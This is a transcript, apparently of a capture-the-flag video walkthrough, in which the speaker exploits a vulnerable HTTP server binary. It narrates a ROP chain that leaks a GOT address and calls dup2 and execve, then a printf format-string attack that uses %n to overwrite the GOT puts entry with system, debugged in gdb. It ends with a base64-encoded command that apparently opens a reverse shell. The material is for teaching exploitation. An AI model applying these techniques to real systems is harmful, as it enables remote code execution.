these two were done through object dump and readelf. So here's the very first ROP chain. So the very first thing we do is we're going to grab the second argument, which is RSI, and we're going to put the global offset location for right there. And then we're going to put 0x8, which is the size of data we are writing. And then with those two arguments, we can just call write. And again, we don't want to specify the file descriptor, which is 4 in this case, because it is set from this call right here is setting it to be 4. So we could manually set this file descriptor to be 4, but there's a chance it may not be 4, because if there was like, let's just show it working real quick. ID, it works. So let's just say you're doing this server and localhost 1337. The file descriptor is not 4 right now, and it works because we're not manually popping it. But wait. Maybe it is. Huh. I didn't think it would be. I thought each request would increment it by 1, but it doesn't look like it's happening. So, won't worry about explaining it. But we just didn't set it because it was already set. If you really wanted to, you could do ROP is equal to Pop RDI plus 0x4. And then this one would be plus equals. And then you can change this to be 0x4. So if you really want to do it that way, you could. But I hate setting things if I don't have to. So this calls the write, which will leak the GOT PLT address. Then we go to stage 2, I don't even know what stage this is right now. We've all done screwed up our comments doing this. Next stage, and this will be calculating offsets. And oh, there we go. So this is getting the 8 bytes for leaked address. And again, we're just connecting, waiting for it to say, please enter the message, and then sending it a ROP chain, and then recording the bytes. Here, we do the same thing we did with that elf. Calculate libc's base by just doing write libc minus the leaked address, or the leaked address minus where it occurs in libc. And this was grep write, like that. And create a small function just to do all the rebasing for us, so we don't have to always say this address minus whatnot. Strings ATX, and we grep for ben sh, and this gets us this address. Again, object dump to get dupe2, object dump to get ExecVE, and here we are creating our chain. So I'm going to put null here, because we're just using the file descriptor, which is already on the stack. And this argument is RSI, so that's why we're putting 0 there. This one is 1. And again, call dupe2. And finally, the last one. So that is that. So let's take a break from doing a bunch of ROP chaining and get into exploiting libc. So let's exit all this. This is quit. Exit. We don't need this anymore either. Boom. So if you're unfamiliar with PrintF, the best resource I have found is on YouTube. And if you just search like live overflow PrintF, he's got like 3 videos that are great. So this is the one in specific we're doing, the 0x13. I think this is the first one in the series, the 0x11. So probably watch both of these would be a good background if you get lost at what we're doing. So we're just going to jump straight into it. And cd HTTP server on both. And let's copy exploit to be manual.py. And we're not going to bother doing all this rebasing stuff manually, because we literally just did that a few minutes ago. So all we're interested in right now is what this fmt str payload thing's doing. So I'm even going to remove the command, and we're just going to send payloads. So the key thing in this printf is knowing that you can write to memory addresses along with leaking them. So as a precursor, remember we did this HTTP server, and then let's see, we can do payload is equal to 1, 2, 3, 4 A's. And then we can do payload plus equals, was it %x, and then times 60, we'll say. And see what happens here. Python 3 manual.py. And this is where we were leaking addresses. And the A's are right here. And this was at the 53rd spot. So what we're going to do is load the address we want to leak here. So this is going to be P32, and we want to leak, we want to overwrite the GOT puts. So we can look at what GOT puts was. It is this. So this is the address we are overwriting. And then what we can do is say, hey, libc print. I think that's 4 spaces. And I think we have to encode this because this is going to be coming encoded. And payload plus equals. And we can say, hey, libc, write it to this address. So what this is doing is printing 4 characters, and it's going to write them to the address at 53. And that was all the way down here. This is 53. We just, remember, split all these. So if you just did copy, and then Python 3, x equals this, x equals x dot split, split, and then x dot index, 4 A's, it's 53. So that's where we got that 53 number from. So let's see what happens here. So we're going to do pkill-9 http server gdb./http server, run it, break on fork, run our exploit. We're gonna jump over the first one, and now we're going to set follow fork mode to be child. And we want to look at, it was log access is the vulnerable function where printf is. I'm going to break on printf. And we should follow this right in here. If we do GOT puts, we can see we're currently 56556126. I'm going to do N to step over this call. GOT puts. Whoa. That wasn't supposed to happen. It was supposed to write 4 to this. Let's see. Payload plus equals. This is going to be GOT puts. This needs to be %4x, not $. So that should be that. Quit. Run the same thing again. We can just do control R fork, B space F, C, run, continue the first time, and now we can do B space star. All these addresses should be the same because we're loading this up in GDB with ASLR disabled. So continue, got puts, next, got puts. Still didn't do what I expected it to. See. Take a look at this. Let's see. %4x, that's right. And %53, that should go in here. I want to say this is correct. Let's see, quit. Just run this. let's see. If we don't do this 53, we get that 404. So we're overwriting it. Uh, 5656126. 5656126. pkill-9. We shouldn't be able to connect to this anymore, right? Okay. Let's do this one last time. Run, break on fork, run, jump over the first one because this is just getting proc maps. I guess I should really hard code these addresses so we can stop doing that step. Set follow fork child, this as log access, and we want to grab this second printf. We stir this. Continue, so we hit this. We got the memory address, %4x, %53$n. This is what we're doing. That's correct. Put GOTs, GOT puts. Weird. I'm screwing something up. I wonder if this is actually at 54. Let's see. F048. Wait, do I have the wrong address? 5A048. I don't know where I got that from. 1 2 1 2 1. What? I have no idea where that one address came from. Payload equals P32. That's the address we want. It is way too late for me right now. There we go. Well, at least you know what's going to happen if you put the wrong address there. So, run, b fork, continue, run this, jump over the first one, set the follow fork mode to child, break on the printf, continue, and then we can do GOT puts, step over, and it's 0xc. So what this did was we probably printed 8 here, and then 2 more and 1, probably, and that's 13. So there's probably like a \n somewhere that we printed or something. But that's that. And we'd want to get all the way to the system address. And we can't just print out this in spaces. So if we did Python print 0x this, we just can't print out all these numbers. It's too big. Weird things will happen. But we can break this up into 2 chunks and then print both of these numbers. So let's get it equal to 65E0. So I'm going to print 65E0 minus, what is it? 0xc. I think +4 I'd want, because we already are printing 4 and we're going to remove those 4. 0x. So probably hex 260. Oh, we don't want to do that. We just want this. So this should be able to print the last 4. And while we do that, we're going to actually, yeah, we'll do this. So we're going to print this plus 2. And we're going to copy these 2 lines, put this to be plus equals, and this one will be 54. This is just one iterator up. And let's see, 26072. So let's do Python, and we want this to be equal to this. So we can do print 0x that minus 26072. 37385. So we can try this first and see what happens. Okay. So let's now run this. We need to break on fork. Now we can follow mode and then break on printf. Continue to that. GOT puts. Next, GOT puts. So now it is 65E0. That's exactly what we want. And F7E9. And we're at F7E1. So we went probably 8 too far, or maybe 7. We'll just try 8 first. So V manual. This will be 0. Wait. 85 minus, what were we saying? 8, so 76 should be it. So let's just run it, break on fork, C, and now we can continue past this, set follow fork, break on what we want to. This is the printf statement. Continue, GOT puts, step in once, GOT puts, F7E0, F7E1, 65E0. So I am short 1. So we can just go back here and 77. I subtracted 9 earlier, not 8. Let's do this one last time. Run, B fork, continue, set, continue, next, and then GOT puts. And we have F7E1, F7E1, 65E0 at this. So now we can continue and get out of this. Whoa. P-kill it and edit this. And we can actually put our command here. I'm not exactly sure what command that one's doing. It's probably port 9001 on us. Grep cmd on manual. And we can echo-n base64-d. That is on localhost. Run. And Python 3 manual.py. And we get the shell. It's weird that it has base64 invalid input, but looks like it's working. And that is the libc exploit. So hope you guys enjoyed that and kind of understand how it works. Again, all it is this n says how many characters have been printed before, and you write it into what register you want. So hopefully it makes sense. Take care, and I will see you all next week.